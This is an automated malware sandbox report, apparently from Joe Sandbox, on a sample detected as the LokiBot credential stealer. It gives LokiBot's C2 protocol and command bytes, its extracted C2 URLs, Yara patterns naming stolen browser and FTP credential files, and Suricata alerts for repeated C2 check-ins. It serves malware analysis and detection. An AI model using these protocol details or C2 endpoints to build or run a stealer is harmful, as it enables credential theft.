Edit tour

Windows Analysis Report
vsf098633534.exe

Overview

General Information

Sample name:	vsf098633534.exe
Analysis ID:	1619628
MD5:	cb68430ac5f87fddaf2af8477b82308c
SHA1:	4b86f7f627f7bb989fc02e76dfe687c7d0d5ca91
SHA256:	5eb39af58bc99962a6439d873bda78086903301b0476ef79daf3802220fdf382
Tags:	exeLokiuser-threatcat_ch
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Lokibot

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected aPLib compressed binary

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found evasive API chain (date check)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample file is different than original file name gathered from version info

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

vsf098633534.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\vsf098633534.exe" MD5: CB68430AC5F87FDDAF2AF8477B82308C)

svchost.exe (PID: 7080 cmdline: "C:\Users\user\Desktop\vsf098633534.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2918405365.0000000003212000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2918036056.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000000.00000002.1677980665.0000000000CF0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Process Memory Space: vsf098633534.exe PID: 7020	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: vsf098633534.exe PID: 7020	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: vsf098633534.exe PID: 7020	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x189fe6:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: svchost.exe PID: 7080	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 7080	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: svchost.exe PID: 7080	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: svchost.exe PID: 7080	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x13fcc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
0.2.vsf098633534.exe.cf0000.1.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.vsf098633534.exe.cf0000.1.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.vsf098633534.exe.cf0000.1.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.vsf098633534.exe.cf0000.1.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
0.2.vsf098633534.exe.cf0000.1.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.vsf098633534.exe.cf0000.1.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0.2.vsf098633534.exe.cf0000.1.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0.2.vsf098633534.exe.cf0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vsf098633534.exe.cf0000.1.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0.2.vsf098633534.exe.cf0000.1.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0.2.vsf098633534.exe.cf0000.1.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
0.2.vsf098633534.exe.cf0000.1.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0.2.vsf098633534.exe.cf0000.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.svchost.exe.400000.0.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.svchost.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.svchost.exe.400000.0.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.svchost.exe.400000.0.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.svchost.exe.400000.0.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
Click to see the 24 entries

Sigma Signatures

System Summary

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ParentImage: C:\Users\user\Desktop\vsf098633534.exe, ParentProcessId: 7020, ParentProcessName: vsf098633534.exe, ProcessCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ProcessId: 7080, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine: "C:\Users\user\Desktop\vsf098633534.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ParentImage: C:\Users\user\Desktop\vsf098633534.exe, ParentProcessId: 7020, ParentProcessName: vsf098633534.exe, ProcessCommandLine: "C:\Users\user\Desktop\vsf098633534.exe", ProcessId: 7080, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:15.323418+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:17.388825+0100	2024312	1	A Network Trojan was detected	192.168.2.4	49732	104.21.64.1	80	TCP

ET MALWARE LokiBot Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-20T03:43:14.532930+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49731	104.21.64.1	80	TCP
2025-02-20T03:43:16.479030+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49732	104.21.64.1	80	TCP
2025-02-20T03:43:17.451575+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49733	104.21.64.1	80	TCP
2025-02-20T03:43:19.442017+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49734	104.21.64.1	80	TCP
2025-02-20T03:43:21.771429+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49735	104.21.64.1	80	TCP
2025-02-20T03:43:23.729997+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49736	104.21.64.1	80	TCP
2025-02-20T03:43:25.651126+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49737	104.21.64.1	80	TCP
2025-02-20T03:43:27.752713+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49738	104.21.64.1	80	TCP
2025-02-20T03:43:29.660543+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.64.1	80	TCP
2025-02-20T03:43:31.521910+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49745	104.21.64.1	80	TCP
2025-02-20T03:43:33.456489+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49747	104.21.64.1	80	TCP
2025-02-20T03:43:35.363345+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49748	104.21.64.1	80	TCP
2025-02-20T03:43:37.303125+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49749	104.21.64.1	80	TCP
2025-02-20T03:43:39.205648+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49750	104.21.64.1	80	TCP
2025-02-20T03:43:41.134380+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49751	104.21.64.1	80	TCP
2025-02-20T03:43:43.094784+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49752	104.21.64.1	80	TCP
2025-02-20T03:43:45.102723+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49753	104.21.64.1	80	TCP
2025-02-20T03:43:46.997245+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49754	104.21.64.1	80	TCP
2025-02-20T03:43:48.866259+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49755	104.21.64.1	80	TCP
2025-02-20T03:43:50.820013+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49756	104.21.64.1	80	TCP
2025-02-20T03:43:52.721741+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49757	104.21.64.1	80	TCP
2025-02-20T03:43:54.693351+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49758	104.21.64.1	80	TCP
2025-02-20T03:43:56.661305+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49759	104.21.64.1	80	TCP
2025-02-20T03:43:58.705695+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49760	104.21.64.1	80	TCP
2025-02-20T03:44:00.632178+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49761	104.21.64.1	80	TCP
2025-02-20T03:44:02.549016+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49762	104.21.64.1	80	TCP
2025-02-20T03:44:04.348269+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49763	104.21.64.1	80	TCP
2025-02-20T03:44:06.337593+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49764	104.21.64.1	80	TCP
2025-02-20T03:44:08.290722+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49766	104.21.64.1	80	TCP
2025-02-20T03:44:10.316672+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49768	104.21.64.1	80	TCP
2025-02-20T03:44:12.216353+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49779	104.21.64.1	80	TCP
2025-02-20T03:44:14.257584+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49793	104.21.64.1	80	TCP
2025-02-20T03:44:16.237190+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49806	104.21.64.1	80	TCP
2025-02-20T03:44:18.180783+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49819	104.21.64.1	80	TCP
2025-02-20T03:44:20.117514+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49829	104.21.64.1	80	TCP
2025-02-20T03:44:22.080002+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49840	104.21.64.1	80	TCP
2025-02-20T03:44:24.005441+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49854	104.21.64.1	80	TCP
2025-02-20T03:44:25.986832+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49868	104.21.64.1	80	TCP
2025-02-20T03:44:27.785264+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49881	104.21.64.1	80	TCP
2025-02-20T03:44:29.675258+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49892	104.21.64.1	80	TCP
2025-02-20T03:44:31.765736+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49908	104.21.64.1	80	TCP
2025-02-20T03:44:33.834170+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49922	104.21.64.1	80	TCP
2025-02-20T03:44:35.821785+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49934	104.21.64.1	80	TCP
2025-02-20T03:44:37.738492+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49946	104.21.64.1	80	TCP
2025-02-20T03:44:39.722812+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49958	104.21.64.1	80	TCP
2025-02-20T03:44:41.717939+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49973	104.21.64.1	80	TCP
2025-02-20T03:44:43.553868+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49986	104.21.64.1	80	TCP
2025-02-20T03:44:45.418212+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	49999	104.21.64.1	80	TCP
2025-02-20T03:44:47.367804+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50013	104.21.64.1	80	TCP
2025-02-20T03:44:49.319994+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50027	104.21.64.1	80	TCP
2025-02-20T03:44:51.269807+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50041	104.21.64.1	80	TCP
2025-02-20T03:44:53.251485+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50053	104.21.64.1	80	TCP
2025-02-20T03:44:55.447771+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50056	104.21.64.1	80	TCP
2025-02-20T03:44:57.397582+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50057	104.21.64.1	80	TCP
2025-02-20T03:44:59.369050+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50058	104.21.64.1	80	TCP
2025-02-20T03:45:01.395935+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50059	104.21.64.1	80	TCP
2025-02-20T03:45:03.336005+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50060	104.21.64.1	80	TCP
2025-02-20T03:45:05.459884+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50061	104.21.64.1	80	TCP
2025-02-20T03:45:07.274491+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50062	104.21.64.1	80	TCP
2025-02-20T03:45:09.425072+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50063	104.21.64.1	80	TCP
2025-02-20T03:45:11.338444+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50064	104.21.64.1	80	TCP
2025-02-20T03:45:13.295502+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50065	104.21.64.1	80	TCP
2025-02-20T03:45:15.286586+0100	2025381	1	Malware Command and Control Activity Detected	192.168.2.4	50066	104.21.64.1	80	TCP
